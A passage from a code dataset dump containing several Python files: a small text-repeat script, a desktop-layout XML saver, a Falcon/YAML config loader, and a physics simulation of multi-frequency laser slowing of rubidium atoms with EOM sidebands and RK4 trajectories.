inf.readline().strip()\n\nw = [value for value in re.findall(\"[a-zA-Z]*\", x) if value != '']\nn = [value for value in re.findall(\"[0-9]*\", x) if value != '']\n\nresult = ''\nfor i in range(len(w)):\n result += w[i] * int(n[i])\n\nwith open('output.txt', 'w') as ans:\n ans.write(result)\n","sub_path":"read_&_write_to_file.py","file_name":"read_&_write_to_file.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"290267515","text":"\r\nfrom org.egedede.bureau.model import Bureau\r\nfrom org.egedede.bureau.model import Element\r\nfrom org.egedede.bureau import Configuration\r\n\r\nfrom xml.dom import minidom\r\nfrom xml.dom.minidom import getDOMImplementation\r\n\r\nclass BureauStorer:\r\n \r\n def __init__(self):\r\n self.pathManager = None\r\n \r\n def store(self,name,bureau):\r\n \r\n impl = getDOMImplementation()\r\n\r\n doc = impl.createDocument(None, \"desktop\", None)\r\n top_element = doc.documentElement\r\n text = doc.createTextNode('Some textual content.')\r\n top_element.appendChild(text) \r\n for element in bureau.elements:\r\n nom=element.nom\r\n x=element.x\r\n y=element.y\r\n commande=self.pathManager.packagePath(element.commande)\r\n icone=self.pathManager.packagePath(element.icone)\r\n cwd=self.pathManager.packagePath(element.cwd)\r\n xmlElement = doc.createElement(\"element\")\r\n xmlElement.setAttribute('nom',nom)\r\n xmlElement.setAttribute('x',str(x))\r\n xmlElement.setAttribute('y',str(y))\r\n xmlElement.setAttribute('commande',commande)\r\n xmlElement.setAttribute('icone',icone)\r\n if cwd:\r\n xmlElement.setAttribute('home',cwd)\r\n top_element.appendChild(xmlElement)\r\n # writing xml in file\r\n computedPath = Configuration.Configuration.getInstance('general').getProperty('last_session')\r\n if self.pathManager:\r\n computedPath = self.pathManager.computePath(computedPath)\r\n \r\n file_object = open(computedPath, \"w\")\r\n file_object.write(doc.toprettyxml())\r\n file_object.close()\r\n","sub_path":"branches/V0.5/org/egedede/bureau/managers/BureauStorer.py","file_name":"BureauStorer.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"475826356","text":"import falcon\nimport logging\nimport yaml\nimport kata.errors\n\n_app = None\ndata = None\n\ndef app():\n global _app\n if _app is None:\n _app = falcon.API()\n _app.add_error_handler(Exception, kata.errors.handler)\n\n return _app\n\ndef initialize(config_file):\n global data\n\n with open(config_file, 'r') as f:\n data = yaml.load(f.read())\n if not data:\n return\n\n data.setdefault('debug', False)\n if data.get('debug', False):\n logging.getLogger().setLevel(logging.DEBUG)\n\n if 'cache' in data:\n import kata.cache\n kata.cache.initialize(data['cache'])\n\n if 'database' in data:\n import kata.db\n kata.db.initialize(data['database'])\n\n if 'statsd' in data:\n import kata.stats\n kata.stats.initialize(data['statsd'])\n\n if 'errors' in data:\n import kata.errors\n kata.errors.initialize(data['errors'])\n\n if 'assets' in data:\n assets = data.get('assets', {})\n assets.setdefault('prefix', '/assets')\n assets_src = assets.get('src', {})\n assets_src.setdefault('css', 'assets/src/css')\n assets_src.setdefault('js', 'assets/src/js')\n assets['src'] = assets_src\n assets_build = assets.get('build', {})\n assets_build.setdefault('css', 'assets/build/css')\n assets_build.setdefault('js', 'assets/build/js')\n 
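# Persist the normalised src/build paths back onto the config before kata.assets consumes it.\n        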
assets['build'] = assets_build\n data['assets'] = assets\n\n import kata.assets\n kata.assets.initialize(data['assets'])\n","sub_path":"kata/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"157670852","text":"import numpy as np \nimport scipy.stats as sts\nimport matplotlib.pyplot as plt\nimport scipy.constants as sc\nimport scipy.special as scp\nimport timeit\nstart = timeit.default_timer()\nplt.close('all')\n\nfig = plt.figure()\nax1 = plt.subplot2grid((4,4), (0,1), colspan=3, rowspan=1)\nax2 = plt.subplot2grid((4,4), (1,1), colspan=3,sharex=ax1, rowspan=2)\nax5 = plt.subplot2grid((4,4), (3,1), colspan=3,sharex=ax1, rowspan=1)\nax3 = plt.subplot2grid((4,4), (0,0), rowspan=3)\nax4 = plt.subplot2grid((4,4), (3,0), rowspan=1)\n\nE0 = 300\nBeta = 0.3\n\nRF = 5e6 # EOM's RF input \nAOM = 35e6 # \"AOM\"'s detuning \n\naa = 0.15 # Coil Radius\ns = 0.11 # Coil Separation\nCurr = 0.6805 # Current (16G/cm @ 0.6805)\nz0 = 0.173 # Position of MOT centre\n\nh = 0.0001 # Step Size\nNatoms = 100 # Atoms\nNsteps = 170 # Steps\n\nCol_Gap = 0.002 # Pinhole Diameter\nymot = 0.008 # Diameter of Cold Atoms\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n''' E O M & F r e q D u b t i m e '''\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nG = 38.11e6 \nwab = 2*np.pi*384.23e12 # Freq of transation\n\nhbar = sc.hbar # hbar\ndip = 3.485e-29 # dipole moment\nc = sc.c\nu = sc.proton_mass # Proton Mass\nM = 87*u # Mass of 87Rb\nbeta = np.linspace(0,4,80)\n\ndef EOM(RF, Beta): # [][1=Freq 0=E],AOM\n ' [0,1,2,3,4] = Center High1stSideBand Low1stSideBand High2ndSideBand... '\n Ei0 = scp.jv(0,Beta)\n Ei1 = scp.jv(1,Beta)\n Ei2 = scp.jv(2,Beta)\n Ei3 = scp.jv(3,Beta)\n F0 = wab/2 \n Fp1, Fm1 = wab/2+RF, wab/2-RF\n Fp2, Fm2 = wab/2+2*RF, wab/2-2*RF\n Fp3, Fm3 = wab/2+3*RF, wab/2-3*RF\n return [Ei0,F0],[Ei1,Fp1],[-Ei1,Fm1],[Ei2,Fp2],[Ei2,Fm2],[Ei3,Fp3],[-Ei3,Fm3]\n# -- EOM[band][E,F] --\n\nax4.plot(beta, abs(EOM(RF, beta)[0][0]),linewidth=9,c='darkviolet')\nax4.plot(beta, abs(EOM(RF, beta)[2][0]),linewidth=7,c='mediumorchid')\nax4.plot(beta, abs(EOM(RF, beta)[4][0]),linewidth=5,c='violet')\nax4.plot(beta, abs(EOM(RF, beta)[6][0]),linewidth=3,c='indigo')\nax4.axvline(Beta,c='k', linestyle='dashed')\nax4.axhline(abs(EOM(RF, Beta)[0][0]),linewidth=8,c='darkviolet', linestyle='dotted')\nax4.axhline(abs(EOM(RF, Beta)[2][0]),linewidth=6,c='mediumorchid', linestyle='dotted')\nax4.axhline(abs(EOM(RF, Beta)[4][0]),linewidth=4,c='violet', linestyle='dotted')\nax4.axhline(abs(EOM(RF, Beta)[6][0]),linewidth=3,c='indigo', linestyle='dotted')\n\n# Freq and Efield together\nA0 = [EOM(RF, Beta)[0][1],EOM(RF, Beta)[0][0]]\nA1p = [EOM(RF, Beta)[1][1],EOM(RF, Beta)[1][0]]\nA1m = [EOM(RF, Beta)[2][1],EOM(RF, Beta)[2][0]]\nA2p = [EOM(RF, Beta)[3][1],EOM(RF, Beta)[3][0]]\nA2m = [EOM(RF, Beta)[4][1],EOM(RF, Beta)[4][0]]\nA3p = [EOM(RF, Beta)[5][1],EOM(RF, Beta)[5][0]]\nA3m = [EOM(RF, Beta)[6][1],EOM(RF, Beta)[6][0]]\n\n\n# Adding and multiplying all permutations\n# abcde = 1st thing 0,1p.. 
= 2nd thing\ne0 = [A0[0]+A0[0], A0[1]*A0[1]]\ne1p = [A0[0]+A1p[0], A0[1]*A1p[1]]\ne1m = [A0[0]+A1m[0], A0[1]*A1m[1]]\ne2p = [A0[0]+A2p[0], A0[1]*A2p[1]]\ne2m = [A0[0]+A2m[0], A0[1]*A2m[1]]\ne3p = [A0[0]+A3p[0], A0[1]*A3p[1]]\ne3m = [A0[0]+A3m[0], A0[1]*A3m[1]]\nEE = [e0,e1p,e1m,e2p,e2m,e3p,e3m]\n\na0 = [A1p[0]+A0[0], A1p[1]*A0[1]]\na1p = [A1p[0]+A1p[0], A1p[1]*A1p[1]]\na1m = [A1p[0]+A1m[0], A1p[1]*A1m[1]]\na2p = [A1p[0]+A2p[0], A1p[1]*A2p[1]]\na2m = [A1p[0]+A2m[0], A1p[1]*A2m[1]]\na3p = [A1p[0]+A3p[0], A1p[1]*A3p[1]]\na3m = [A1p[0]+A3m[0], A1p[1]*A3m[1]]\nAA = [a0,a1p,a1m,a2p,a2m,a3p,a3m]\n\nb0 = [A1m[0]+A0[0], A1m[1]*A0[1]]\nb1p = [A1m[0]+A1p[0], A1m[1]*A1p[1]]\nb1m = [A1m[0]+A1m[0], A1m[1]*A1m[1]]\nb2p = [A1m[0]+A2p[0], A1m[1]*A2p[1]]\nb2m = [A1m[0]+A2m[0], A1m[1]*A2m[1]]\nb3p = [A1m[0]+A3p[0], A1m[1]*A3p[1]]\nb3m = [A1m[0]+A3m[0], A1m[1]*A3m[1]]\nBB = [b0,b1p,b1m,b2p,b2m,b3p,b3m]\n\nc0 = [A2p[0]+A0[0], A2p[1]*A0[1]]\nc1p = [A2p[0]+A1p[0], A2p[1]*A1p[1]]\nc1m = [A2p[0]+A1m[0], A2p[1]*A1m[1]]\nc2p = [A2p[0]+A2p[0], A2p[1]*A2p[1]]\nc2m = [A2p[0]+A2m[0], A2p[1]*A2m[1]]\nc3p = [A2p[0]+A3p[0], A2p[1]*A3p[1]]\nc3m = [A2p[0]+A3m[0], A2p[1]*A3m[1]]\nCC = [c0,c1p,c1m,c2p,c2m,c3p,c3m]\n\nd0 = [A2m[0]+A0[0], A2m[1]*A0[1]]\nd1p = [A2m[0]+A1p[0], A2m[1]*A1p[1]]\nd1m = [A2m[0]+A1m[0], A2m[1]*A1m[1]]\nd2p = [A2m[0]+A2p[0], A2m[1]*A2p[1]]\nd2m = [A2m[0]+A2m[0], A2m[1]*A2m[1]]\nd3p = [A2m[0]+A3p[0], A2m[1]*A3p[1]]\nd3m = [A2m[0]+A3m[0], A2m[1]*A3m[1]]\nDD = [d0,d1p,d1m,d2p,d2m,d3p,d3m]\n\n# FF pairs the +3rd sideband (A3p) with every band; GG below pairs the -3rd (A3m).\nf0 = [A3p[0]+A0[0], A3p[1]*A0[1]]\nf1p = [A3p[0]+A1p[0], A3p[1]*A1p[1]]\nf1m = [A3p[0]+A1m[0], A3p[1]*A1m[1]]\nf2p = [A3p[0]+A2p[0], A3p[1]*A2p[1]]\nf2m = [A3p[0]+A2m[0], A3p[1]*A2m[1]]\nf3p = [A3p[0]+A3p[0], A3p[1]*A3p[1]]\nf3m = [A3p[0]+A3m[0], A3p[1]*A3m[1]]\nFF = [f0,f1p,f1m,f2p,f2m,f3p,f3m]\n\ng0 = [A3m[0]+A0[0], A3m[1]*A0[1]]\ng1p = [A3m[0]+A1p[0], A3m[1]*A1p[1]]\ng1m = [A3m[0]+A1m[0], A3m[1]*A1m[1]]\ng2p = [A3m[0]+A2p[0], A3m[1]*A2p[1]]\ng2m = [A3m[0]+A2m[0], A3m[1]*A2m[1]]\ng3p = [A3m[0]+A3p[0], A3m[1]*A3p[1]]\ng3m = [A3m[0]+A3m[0], A3m[1]*A3m[1]]\nGG = [g0,g1p,g1m,g2p,g2m,g3p,g3m]\n\n\nfor j in range(7): \n    ax3.scatter(EE[j][0]-AOM ,EE[j][1],s=100,alpha=0.3) \n    ax3.scatter(AA[j][0]-AOM ,AA[j][1],s=100,alpha=0.3)\n    ax3.scatter(BB[j][0]-AOM ,BB[j][1],s=100,alpha=0.3)\n    ax3.scatter(CC[j][0]-AOM ,CC[j][1],s=100,alpha=0.3)\n    ax3.scatter(DD[j][0]-AOM ,DD[j][1],s=100,alpha=0.3)\n    ax3.scatter(FF[j][0]-AOM ,FF[j][1],s=100,alpha=0.3)\n    ax3.scatter(GG[j][0]-AOM ,GG[j][1],s=100,alpha=0.3)\n\nBBig = np.array([a0,a1p,a1m,a2p,a2m,b0,b1p,b1m,b2p,b2m,c0,c1p,c1m,c2p,c2m,d0,d1p,d1m,d2p,d2m,e0,e1p,e1m,e2p,e2m,f0,f1p,f1m,f2p,f2m,f3p,f3m,g0,g1p,g1m,g2p,g2m,g3p,g3m])\nFlist = BBig[:,0]\nXX = [] # Index of frequency values\nfor l in range(len(BBig)):\n    '''test for dups - get index symm - choose 1st'''\n    x = np.where(BBig[:,0] == Flist[l])[0]\n    xx = x[0]\n    XX.append(x[0])\nXX_0 = list(dict.fromkeys(XX)) # Dup Prepended list\nXX_ = np.sort(XX_0)\nFplot_ = []\nfor i in range(len(XX_)):\n    '''Takes the 1st index & gives freq'''\n    Fplot_.append(Flist[XX_[i]])\n    Fplot = np.subtract(Fplot_,AOM)\n\nJsum = []\nX0 = []\nX0_ = []\nfor I in range(len(Flist)):\n    x0 = np.where(BBig[:,0] == Flist[I])[0]\n    X0.append(x0)\nu =[]\nfor i in range(len(X0)):\n    U=[]\n    u = (X0[i])\n    for j in range(len(X0[i])):\n        U.append(u[j])\n    X0_.append(U) \nX0_U = np.unique(X0_) # Index Prepended list\n\nYy=[]\nfor j in range(len(Fplot)):\n    for l in range(len(X0_U[j])):\n        y = BBig[X0_U[j][l]][1]\n        Yy.append([y])\n        Y = np.sum(Yy)\n    Jsum.append(Y)\n    
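# Reset the accumulator before summing the next frequency bin.\n    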
Yy=[]\n\nax3.scatter(Fplot,np.square(Jsum),s=1000,c='y',alpha=0.4)\nax3.plot(Fplot,np.square(Jsum),c='y')\nax3.scatter(Fplot,Jsum,s=200,c='G',alpha=0.3)\nax3.set_xlabel('MHz',size=10)\nax3.set_ylabel('Electric Field / E0',size=15)\nax4.set_xlabel(r'$ \\beta $',size=22)\nax4.set_ylabel('Bessel Value',size=13)\nax3.grid(which='major')\nax3.set_xlim(left=min(Fplot)-2*RF, right=wab+RF*2)\nfor i in range(len(Fplot)):\n ax3.axvline(Fplot[i],alpha=0.3)\nax3.axvline(wab, c='pink',linewidth=9)\n\n\n\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n''' F O R C E L O O P '''\n # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \nForder = sorted(range(len(Jsum)), key=lambda kk: Fplot[kk])\n# The Index list that gives Increasing FREQUENCIES ^\nDorder = Forder[::-1] # reversed order\nD = [] # Detuning\nRabi = [] # Rabi Freq\nII = [] # II is the new IoIs = Intensity / Saturation Intensity \n\nL = len(Forder)\nfor i in range(L):\n dd = wab - Fplot[Dorder[i]]\n RR = dip*Jsum[Forder[i]]*E0/hbar\n D.append(dd)\n Rabi.append(RR)\n\nfor i in range(L):\n ii = 2*Rabi[i]**2/G**2 \n II.append(ii)\n\nw_=[]\nc1 = []\nfor i in range(L):\n ww = Fplot[Forder[i]]\n ccaa = 1+II[i]+4*D[i]**2/G**2\n w_.append(ww)\n c1.append(ccaa)\n\nw = wab - AOM # Average Freq of colliding photon\nLambda = 2*np.pi*c/w # Avg Wavelength\nk = 2*np.pi/Lambda # Average wavenumber of a momentum transfering photon\n\ndef dv(t,z,v): \n \" The 'complete' Force Equation for a 7 freq 1 dimensional slower inc. magnetic field \"# F O R C E F O R C E F O R C E F O R C E F O R C E F O R C E\n O = []\n for i in range(L):\n ooo = w_[i]/(2*np.pi*c)#-muB*MagLeak(z, z0, Curr)/hbar\n O.append(ooo)\n c2,c3 = [],[] \n for i in range(L):\n cc22 = O[i]*8*D[i]/G**2\n cc33 = 4*O[i]**2/G**2 \n c2.append(cc22)\n c3.append(cc33)\n Rho = []\n for i in range(L):\n rrr = II[i]/(c1[i]-c2[i]*v+c3[i]*v**2)\n Rho.append(rrr)\n rhoaa = np.sum(Rho)\n return -rhoaa*hbar*k*G/M/2\n\ndef dv4y(t,z,v):\n return 0\n\ndef dz(t,z,v):\n return v \n \n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n''' I N I T I A L C O N D I T I O N S '''\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\ndef y_vGauss(n):\n# T = 273+20\n# g = np.random.normal(loc=0.0, scale=sc.k*T/M, size=n)\n g = np.random.normal(loc=0.0, scale=0.05, size=n)\n# g = np.linspace(-1,1, n)\n return g\ndef MBrand(n):\n #x = np.random.rand(n)\n x = np.linspace(0.0001,1,n)\n kb = sc.Boltzmann # Boltzmann Constant\n u = sc.proton_mass # Proton Mass\n M = 87*u # Mass of 87Rb\n a=abs(np.sqrt((kb*370)/(M)))\n X = sts.maxwell.isf(x, scale=a)\n return X\n\n\ndef Jgen(T,n,M):\n ''' Maxwell-Boltzmann Distrb. '''\n T = 273+20\n MB=sts.maxwell\n kb=1.38e-23\n a=abs(np.sqrt((kb*T)/(M)))\n vt=MB.rvs(loc=0, scale=a, size=n, random_state=None) \n return vt\n\nVn = 10\nVx = 260\ndef vgen(n):\n ''' Linear Velocity Distrb. '''\n lin = np.linspace(Vn,Vx,n)\n return lin\n \ndef zgen(n):\n ''' Linear Coordinate Distrb. '''\n lin = np.linspace(0,0,n)\n return lin\n\n\ndef yrand(n):\n ran = np.random.random(n)\n return (ran-0.5)*2*Col_Gap\n\nv_ = np.mean(vgen(Natoms))\nRy = ((ymot-Col_Gap/2)*v_)/(z0**2+(ymot-Col_Gap/2)**2)**0.5\ndef ygen(n):\n ''' Linear Coordinate Distrb. 
'''\n \n #lin = np.linspace(-Col_Gap/2,Col_Gap/2,n)\n lin = np.linspace(0,0,n)\n return lin\n\ndef vyrand(n):\n ran = np.random.random(n)\n it = (ran-0.5)*2*Ry\n return it\n'''\ndef MagLeak(z, z0, Curr): \n #Mag Field from AntiHlmHltz coils (of center z0 [ >0 ]) that leaks into our slower\n x = s/2\n ZZ = -z+z0\n zz = -ZZ\n A,B = ZZ/aa, x/aa\n Q = B**2+(1+A)**2\n k = (4*A/Q)**0.5\n B0 = Curr*sc.mu_0/(2*aa)\n K = scp.ellipk(k**2)\n E = scp.ellipe(k**2) \n Br = 2*B0*(x/ZZ)/(np.pi*Q**0.5)*(E*(1+A**2+B**2)/(Q-4*A)-K)\n Bro = np.nan_to_num(Br)\n #\n A_ = zz/aa\n Q_ = B**2+(1+A_)**2\n k_ = (4*A_/Q_)**0.5\n K_ = scp.ellipk(k_**2)\n E_ = scp.ellipe(k_**2) \n Br_ = -2*B0*(x/zz)/(np.pi*Q_**0.5)*(E_*(1+A_**2+B**2)/(Q_-4*A_)-K_)\n Br_o = np.nan_to_num(Br_)\n return Br_o + Bro\n'''\ndef RK4step(ti,zi,vi,h,dv,dz): \n k11=dz(ti,zi,vi)\n k21=dv(ti,zi,vi) \n k12=dz(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21)\n k22=dv(ti+h/2,zi +(h/2)*k11,vi +(h/2)*k21) \n k13=dz(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22)\n k23=dv(ti+h/2,zi +(h/2)*k12,vi +(h/2)*k22) \n k14=dz(ti+h,zi +(h)*k13,vi +(h)*k23)\n k24=dv(ti+h,zi +(h)*k13,vi +(h)*k23) \n z1=zi+(h/6.0)*(k11+2.0*k12+2.0*k13+k14) \n v1=vi+(h/6.0)*(k21+2.0*k22+2.0*k23+k24) \n zi = z1\n vi = v1 \n return zi,vi\n\n\"\"\" Physical & Atomic Constants \"\"\"\nkb = sc.Boltzmann # Boltzmann Constant\nmu0 = sc.mu_0 # Vacc Permtivity\nmuB = 9.2740099*10**-24 # Borh Magnetron\n # Proton Mass\n # hbar\ndip = 3.485e-29 # dipole moment\n # speed of light\npi = np.pi # pi\n # Mass of 87Rb\n # Freq of transation\n#G = 38.11e6 # Gamma / Rate of SpE \n # dipole moment\n\n\"\"\"creation of our array of velocities\"\"\"\n#vlin=vgen(Natoms)\nzlin=zgen(Natoms)\ny_vlin=vyrand(Natoms)\n#ylin=yrand(Natoms)\nvlin=MBrand(Natoms)\nylin=zgen(Natoms)\n#y_vlin=y_vGauss(Natoms)\nzs,vs,ts=[],[],[]\nys,yvs=[],[]\nprint('Trajectorizing...')\n\"\"\"this loop goes through all the atoms we've got and applies the force dv to them for a number of steps, Nsteps\"\"\"\nfor j in range(Natoms):\n vi = vlin[j] \n zi = zlin[j]\n yvi= y_vlin[j]\n yi = ylin[j]\n for i in range(Nsteps):\n ti=h*i \n zs.append(zi)\n vs.append(vi) \n ts.append(ti) \n ys.append(yi)\n yvs.append(yvi)\n z1,v1=RK4step(ti,zi,vi,h,dv,dz)\n y1,yv1=RK4step(ti,yi,yvi,h,dv4y,dz)\n yvi = yv1\n yi = y1\n zi = z1\n vi = v1\n \nY = np.reshape(ys, (Natoms,Nsteps))\nV = np.reshape(vs, (Natoms,Nsteps))\nZ = np.reshape(zs, (Natoms,Nsteps))\ntt = np.array(ts)\nthet = np.split(tt, Natoms)[1]\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n''' C A P T U R E D E T E C T I O N '''\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\nz_ , z__ = z0 - 0.01, z0 + 0.01\ny_ = 0.01\ncapV, capv = 50,15\nn_ = []\nprint('Accumulating...')\nfor j in range(Natoms):\n for i in range(Nsteps):\n if (z_ < Z[j][i] < z__ and abs(Y[j][i]) < y_ and abs(V[j][i]) < capv):\n #Y[j],Z[j] = np.linspace(0,0,Nsteps), np.linspace(0,0.0001,Nsteps)\n nnn = 2\n n_ = np.append(n_, nnn)\n else:\n nnn = 0\n n_ = np.append(n_, nnn)\n \nN = np.reshape(n_, (Natoms, Nsteps))\nN0 = 0\nfor j in range(Natoms):\n for i in range(Nsteps):\n if N[j][i] == 2:\n N0 += 1\n break\nprint('Doing the rest...')\nprint('#Captured = ',N0)\n\nV_ = np.mean(V[:,0])\nVmp,Vrms = V_*(3*pi/8)**0.5, V_*(2*pi/8)**0.5\nprint(V_)\n\n\nCslow = 'blue'\nCslowm = 'green'\nCfastm = 'orange'\nCfast = 'red'\nvVv1 = min(V[:,0], key=lambda g:abs(g-Vmp))\nvVv1v = int(np.where(vVv1 == V[:,0])[0])\nvVv2 = min(V[:,0], key=lambda g:abs(g-V_))\nvVv2v = int(np.where(vVv2 == V[:,0])[0])\nvVv3 = min(V[:,0], key=lambda 
g:abs(g-Vrms))\nvVv3v = int(np.where(vVv3 == V[:,0])[0])\n\n#print(int(vVv1v),vVv2v,vVv3v)\ncol=[]\n\n\nfor i in range(vVv1v):\n col.append(Cfast)\nfor j in range(vVv1v,vVv2v):\n col.append(Cfastm)\nfor k in range(vVv2v,vVv3v):\n col.append(Cslowm)\nfor l in range(vVv3v,Natoms):\n col.append(Cslow)\nprint(len(col))\nfor i in range(Natoms):\n 'A plot for each of the Natoms particles'\n th = 0.4\n ax1.plot(Z[i],Y[i],linewidth=th, color = col[i])\n ax2.plot(Z[i],V[i],linewidth=th, color = col[i])\nprint(len(V[4]))\n\nax1.axhspan(-0.01,0.01, alpha=0.05, color='green')\nax1.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')\nax1.axvline(x = z0 - aa, color = 'k', linestyle='dotted')\nax1.axvline(x = z0, color = 'k', linestyle='dashed')\nax1.axvline(x = z0-0.01, color = 'k',linewidth=1.3)\nax1.axvline(x = z0+0.01, color = 'k',linewidth=1.3)\nax1.axhline(y = Col_Gap/2, color = 'k',linewidth=1.3)\nax1.axhline(y = -Col_Gap/2, color = 'k',linewidth=1.3)\nax2.set_ylim(top=1.5*ymot, bottom=-1.5*ymot)\n\nax2.axvspan(z0-0.01,z0+0.01, alpha=0.05, color='purple')\n#ax2.axhspan(-capV,capV, alpha=0.05, color='b')\nax2.axhspan(-capv,capv, alpha=0.05, color='red')\nax2.axvline(x = z0 - aa, color = 'k', linestyle='dotted')\nax2.axvline(x = z0, color = 'k', linestyle='dashed')\nax2.axvline(x = z0-0.01, color = 'k',linewidth=1.3)\nax2.axvline(x = z0+0.01, color = 'k',linewidth=1.3)\nax2.axhline(y = capv, color = 'k',linewidth=1.3)\nax2.axhline(y = -capv, color = 'k',linewidth=1.3)\n\nax2.set_ylim(top=1.7*Vmp, bottom=-20)\n\n#ax1.subplots_adjust(hspace=0) # Makes the plots that share the \n# # same x axis on top of each other\nax1.set_ylabel(\"y coordinate / m\", size = 15)\nax2.set_ylabel(\"Speed / ms`'\", size = 11)\nax1.set_title('Multi-Frequency: Sim-ya-lator Simulator', size=31)\nax5.set_xlabel('Distance / m (0 = atom source)', size = 15)\nax5.set_ylabel('Spatial Desity @ v=0',size=11)\n#ax1.set_yticks(np.arange(-0.002, 0.002, step=0.0005))\nfrom datetime import date\ntoday = date.today()\nd4 = today.strftime(\"%d-%b-%Y\")\n\nstop = timeit.default_timer()\nIrE = c*8.85e-12/2*E0**2/10000 # Intensity (This /10000 makes it W/cm^2)\n\nprint('Run Time =',round(stop - start, 3),'sec')\nprint(np.sum(Jsum))\nSTR = '{}mW/cm2 [{}] \\n{}MHz =RF \\n{}MHz =AOM \\n{} =Beta [{}]\\n{}% Captured\\n[{}/{}]\\n {} {}s' \niSTR = STR.format(round(IrE,3)*1000, E0, RF/1000000, (AOM)/1000000, Beta, round(np.sum(Jsum),4), round(N0/Natoms,3)*100, N0,Natoms,d4,round(stop - start, 3))\nax2.text(z0*0.4, 230, iSTR,fontsize=18, bbox = dict(boxstyle='round', fc=(0.0,0.0,0.0), alpha=0.2))\n # # # # # # # # # # # # # # # # # # # \n''' Velocity class tracking '''\nv_ = np.linspace(0,1000,1000)\ndef dv_(v_,F,D):\n Lambda=2*pi*c/F\n k = 2*pi/Lambda\n 'Incremental Acceleration'\n O = F/(2*pi*c)\n c1 =1+II[i]+4*D**2/G**2\n c2 = O*8/G**2*D\n c3 = 4*O**2/G**2 \n rhoaa = -II[i]**2/(c1+c2*v_+c3*v_**2) + II[i]**2/(c1-c2*v_+c3*v_**2) \n return rhoaa*hbar*k*G/M\n\n\nS,Ss,Vv=[],[],[] \nfor i in range(L):#reshaped Force(v) \n S.append(dv_(v_,Fplot[i],D[i]))\nS = np.reshape(S,(len(Fplot),len(v_)))\nfor i in range(L):#max indexes\n Sim = np.argmax(S[i])\n Ss = np.append(Ss,Sim)\nfor i in range(L):#indexing velocity\n Vv.append(v_[int(Ss[i])])\nfor i in range(L):\n ax2.axhline(Vv[i],c='brown', linewidth=1.7, alpha=0.34)\nstop = timeit.default_timer()\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n''' V=0 density curve '''\n # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n'''\nBinV=[]\nV0s = []\nfor j in range(Natoms): \n inx = 
(np.abs(V[j]-0)).argmin()\n # print(inx,Z[j][inx])\n V0s.append(Z[j][inx])\n#print(V0s)\n \nBinFactor = 4\nBins = np.linspace(0,2.5*z0,int(Natoms/BinFactor)) # Bins # Bins # Bins # Bins # Bins # Bins # Bins # Bins # Bins #\nprint(Bins)\nHis =np.histogram(V0s,bins=Bins)[0]\nprint('His',His,len(His))\n\nBplot = []\nfor i in range(len(Bins)-1):\n Bplot.append((Bins[i]+Bins[1+i])/2)\n#print('b',Bplot)\nax5.plot(Bplot,His,linewidth=4,color='turquoise')\nax5.fill_between(Bplot,His,0,alpha=0.5,color='turquoise')\n \n# Hpeak[0,1]=value, index\nHpeak = [max(His), int(round( np.median(np.where(His==max(His))) ))]\n\nLmin = max(np.where(His[:Hpeak[1]] == min(His[:Hpeak[1]] ) )[0])\n\nLmax = max(np.where(His[Hpeak[1]:] == min(His[Hpeak[1]:] ) )[0])\n\n#vLmin,vLmax = BinFactor* IS IT POSSIBLE TO CONVERT INTO ORGINAL VELOCITY = not needed right now\nFWi = Lmax-Lmin\n\nBot = max(His[Lmax],His[Lmin])\n\n#print(Bot)\nHM = Bot + (Hpeak[0]+Bot)/2\n\n\nlHM = np.abs(His[:Hpeak[1]]-HM).argmin()\nrHM = np.abs(His[Hpeak[1]:]-HM).argmin()+Hpeak[1]\nprint(lHM,rHM)\n#print(lHM,rHM)\nSkew = -1*(Bplot[Hpeak[1]]-Bplot[lHM]-Bplot[rHM]+Bplot[Hpeak[1]])\nprint('Skew =',Skew,' +=MB')\nFWHM = Bplot[rHM]-Bplot[lHM]\nprint('FWHM =', FWHM)\n\nax5.axhline(y=Hpeak[0],c='k',linewidth=0.4)\nax5.axhline(y=Bot,c='dimgrey',linewidth=0.4)\nax5.axvline(x=Bplot[lHM],c='k',linewidth=0.4)\nax5.axvline(x=Bplot[rHM],c='k',linewidth=0.4)\nStrd = 'FWHM = {}mm\\n÷Cloud Diam = {}\\n[Skew = {}]'\nStrD = Strd.format(round(FWHM,2)*1000,round(FWHM/ymot,4),round(Skew,4)) \nax5.text(0.01,2,StrD,fontsize=16)\nax2.set_xlim(left=0, right=3*z0)\n#print('# Particles = {}'.format(Natoms))\n#print('Beam Intensity = {}W/cm^2'.format(round(IrE, 3)))\n#print('Run Time =',round(stop - start, 3),'sec')\nprint('(',E0,AOM,RF,Beta,')',d4)\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n# APPENDING DISTDENS TO A FILE TO BE USED LATER B First \n\nimport winsound\nfrequency = 2300 # Set Frequency To 2500 Hertz\nduration = 1300 # Set Duration To 1000 ms == 1 second\nwinsound.Beep(frequency, duration)\n\nimport csv\n\nwith open('EOM_Beta_data{}.csv'.format(int(Beta*10)),'w',newline='') as f:#\n Wri = csv.writer(f)\n Wri.writerow(['Bplot,His,w/ Beta=','{}'.format(Beta)])\n for i in range(len(Bplot)):\n Wri.writerow(['{}'.format(Bplot[i]),'{}'.format(His[i]) ])\n'''\nplt.show()","sub_path":"Simulation/VisualS/EOM/Sim_Ya_Lator Simulator.py","file_name":"Sim_Ya_Lator Simulator.py","file_ext":"py","file_size_in_byte":20229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 